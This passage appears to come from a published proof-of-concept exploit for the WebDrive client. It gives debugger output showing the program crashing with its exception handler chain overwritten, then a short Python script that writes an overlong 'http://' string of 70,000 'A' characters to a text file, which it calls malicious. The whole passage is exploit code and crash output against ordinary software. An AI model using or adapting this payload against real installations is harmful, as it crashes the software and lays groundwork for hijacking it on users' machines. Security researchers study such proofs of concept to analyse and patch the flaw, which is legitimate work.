edx=05d2fd48 esi=faa912b8 edi=007ba9f0 +eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0 nv up ei pl nz na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 +*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe +webdrive+0x30ff2b: +003bff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:007c1000=???? +0:000> !exchain +007b89b4: webdrive+35a24e (0040a24e) +007bb3fc: webdrive+360041 (00410041) +Invalid exception stack at 00410041 + +''' + +#Proof of Concept: + +buffer="http://" +buffer+="\x41" * 70000 +off=buffer + +try: + out_file = open("WebDrive.txt",'w') + out_file.write(off) + out_file.close() + print("[*] Malicious txt file created successfully") +except: + print "[!] Error creating file" +